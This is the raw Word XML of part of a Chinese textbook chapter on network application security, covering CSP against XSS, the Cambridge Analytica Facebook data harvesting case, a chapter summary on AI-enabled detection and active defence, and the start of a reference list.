      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本质上就是建立白名单，开发者明确告诉浏览器哪些外部资源可以加载和执行。开发者只需要配置规则，如何拦截是由浏览器自己实现的。可以通过这种方式来尽量减少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41808471" w14:textId="01439DCE" w:rsidR="00B3713F" w:rsidRDefault="00D51F46" w:rsidP="00D51F46">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社交网络安全的机密性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65AAAE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社交网络是指可以让人们彼此连接，分享信息的公共服务平台。可以发布照片、视频等内容与朋友沟通生活状态。主要的社交网络服务平台包括国内的微博、微信、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，还有国外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linkedln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。国内外主流的社交网站有着庞大的用户群体，非常受欢迎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951C7EE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于社交网络拥有天然的人物链接属性，因此在加入人物本身固有的属性，就可以轻而易举的分析出用户的更多信息，利用这些信息企业可以做一些商品的推广。比如，通过分析和你聊天频率，点赞程度分析出你的亲密好友关系，在通过你亲密好友的偏好推荐给你对应的商品，从而精准的投放广告，增加平台收入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FAC89" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，如果相关社交网络的数据被用于恶意行为，那么造成的后果是不可以估量的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被曝光，超过五千万的用户在不知情的情况下，被政治数据公司“剑桥分析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cambridge Analytica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）”获取并利用，意图干预美国大选。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743ACAA6" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月美国总统大选，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受雇于特朗普团队，对选民进行广告的精准投放，来提升投票数量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第一步，就是先掌握大数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是美国社交网络中最大的平台，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下手，获取大数据。首先他们设计了一个大型的心理测试，标榜是剑桥大学讲师所提出的性格测试题目。但是这个心理测试的最后，设定一个钓鱼陷阱，就是要求你登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号，美其名曰结果会通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送给你，但实际上，在你同意登录的那一刻，你的姓名、生日、婚姻状况、位置以及最重要的你发的文章和你点赞的文章数据都会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取。这非常重要，通过这些数据，他们会为你建立一个非常准确、有效的心理模型，再根据你的心理模型，可以有针对性的对你使用不同的“煽动和操纵”方法，促进你的投票。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D3C11" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司的行为无疑是存在问题的，他们首先利用钓鱼陷阱获取数据，在利用社交网络的易传播性，更广泛的获取受害者信息，破坏了社交网络的机密性。但这里要说明的是，虽然该公司自己宣称特朗普当选是自己产品用于实战的成功案例，目前并没有足够的数据和证据去具体衡量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的在这两起事件中发挥的实际作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6010A" w14:textId="7DB237C6" w:rsidR="00D51F46" w:rsidRPr="00B8458A" w:rsidRDefault="00851A96" w:rsidP="00D51F46">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00D51F46" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00D51F46" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552B520" w14:textId="1B020232" w:rsidR="00D51F46" w:rsidRPr="00B8458A" w:rsidRDefault="00061120" w:rsidP="00BD2DE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本章中，我们先分析了当前</w:t>
      </w:r>
      <w:r w:rsidR="00284C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络应用安全的开端，</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强调了网络应用安全的重要性。</w:t>
      </w:r>
      <w:r w:rsidR="00D51F46" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而后，我们从</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各种网络应用出发，介绍了各种网络应用以及对应的安全问题。通过分析各种各种网络应用，我们总结出现有应用安全所存在的共性问题：</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源共享的不确定性；</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用资源的有限性；</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关应用系统的漏洞。提出一些解决问题的办法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB53F6" w14:textId="3591B759" w:rsidR="00D51F46" w:rsidRPr="00B8458A" w:rsidRDefault="00D51F46" w:rsidP="00D51F46">
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidR="00BD2DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全，我们认为在前沿研究领域其有两大发展趋势：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96D1D7" w14:textId="7C19539D" w:rsidR="00D51F46" w:rsidRPr="00B8458A" w:rsidRDefault="00EA0E5C" w:rsidP="00D51F46">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使能的智能检测系统</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61081215 \r \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：随着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术的发展，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能力越来越强大。在数据分析方面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比传统方法性能提升巨大，因此可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的能力应用于应用安全，快速分析安全问题，快速反馈。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD0AB5" w14:textId="10213F3C" w:rsidR="00D51F46" w:rsidRPr="00EA0E5C" w:rsidRDefault="00EA0E5C" w:rsidP="00D51F46">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动网络安全防御</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61081243 \r \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：将</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0E5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动防御方式引入到网络空间中，在基于内</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA0E5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生安全</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA0E5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机理的动态异构冗余构造动态异构冗余构造中引入拟态伪装的策略或机制，则能够使构造所产生的时空不一致的测不准效应更具有狡黠性。拟态伪装策略的导入能够更好的隐蔽或伪装目标对象的防御场景和防御行为，使得目标对象在应对持续性的、极其隐蔽的、高烈度的人机攻防博弈中获得更为可靠的优势地位，尤其是面对当前最大的安全威胁——未知漏洞后门，病毒木马等不确定威胁时，具有显著效果，克服了传统安全方法的诸多问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此利用主动防御架构可以非常有效的客服各种应用安全的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690A748" w14:textId="77777777" w:rsidR="00D51F46" w:rsidRDefault="00D51F46" w:rsidP="00D51F46"/>
    <w:p w14:paraId="12752FC3" w14:textId="77777777" w:rsidR="00D51F46" w:rsidRPr="00D51F46" w:rsidRDefault="00D51F46" w:rsidP="00B3713F"/>
    <w:p w14:paraId="7776A5A2" w14:textId="13DB08C5" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00364DAD"/>
    <w:p w14:paraId="54EC290F" w14:textId="02F006D6" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="4D42DFD0" w14:textId="6AE50F79" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="708F7F47" w14:textId="3D8BFBF4" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="3E4DA685" w14:textId="2FD8D649" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="2CA17B53" w14:textId="5DD2421D" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="663F439A" w14:textId="419D3855" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="4786F576" w14:textId="30CBD772" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="1714F221" w14:textId="132F5595" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="19F2EFF3" w14:textId="5C9C927F" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="7DAD0466" w14:textId="4D2549A9" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="2A87ADF7" w14:textId="2988BB37" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="7D8301A6" w14:textId="7905CC24" w:rsidR="00E6162A" w:rsidRDefault="00E6162A" w:rsidP="00364DAD"/>
    <w:p w14:paraId="23E864C6" w14:textId="6A0E5461" w:rsidR="006F474D" w:rsidRDefault="006F474D" w:rsidP="00EA0E5C">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C80B45" w14:textId="6F13B0ED" w:rsidR="006F474D" w:rsidRDefault="006F474D" w:rsidP="00364DAD"/>
    <w:p w14:paraId="61775940" w14:textId="3DC563B0" w:rsidR="006F474D" w:rsidRDefault="006F474D" w:rsidP="00364DAD"/>
    <w:p w14:paraId="588E28C2" w14:textId="77777777" w:rsidR="006F474D" w:rsidRPr="00B3713F" w:rsidRDefault="006F474D" w:rsidP="00364DAD"/>
    <w:p w14:paraId="3B31BC26" w14:textId="77777777" w:rsidR="00E6162A" w:rsidRPr="00B8458A" w:rsidRDefault="00E6162A" w:rsidP="00E6162A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc60413312"/>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考文献</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="22024A94" w14:textId="51F3CEFF" w:rsidR="003F077C" w:rsidRPr="003F077C" w:rsidRDefault="003F077C" w:rsidP="003F077C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Ref61078390"/>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://cwe.mitre.org/top25/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>"CWE/SANS Top 25 Most Dangerous Programming Errors"</w:t>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>. CWE/SANS. May 2009.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F077C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>http://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="526A3E59" w14:textId="756A62CA" w:rsidR="00593CA9" w:rsidRDefault="00593CA9" w:rsidP="00593CA9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Ref61078521"/>
      <w:r w:rsidRPr="00593CA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Li W, Shen K, Guo R, Liu B, Zhang J, Duan H, Hao S, Chen X, Wang Y. CDN Backfired: Amplification Attacks Based on HTTP Range Requests. In2020 50th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN) 2020 Jun 29 (pp. 14-25). IEEE.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0D5CCA02" w14:textId="41FE250B" w:rsidR="00C04C13" w:rsidRPr="00196341" w:rsidRDefault="00591C8D" w:rsidP="00196341">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Ref61078835"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Rathore S, Sharma PK, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Loia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> V, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Jeong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> YS, Park JH. Social network security: Issues, challenges, threats, and solutions. Information sciences. 2017 Dec </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>1;421:43</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00196341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>-69.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4656B6CE" w14:textId="245F4FFC" w:rsidR="003F077C" w:rsidRDefault="006D156D" w:rsidP="006D156D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Ref61078690"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D156D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D156D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (malware),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
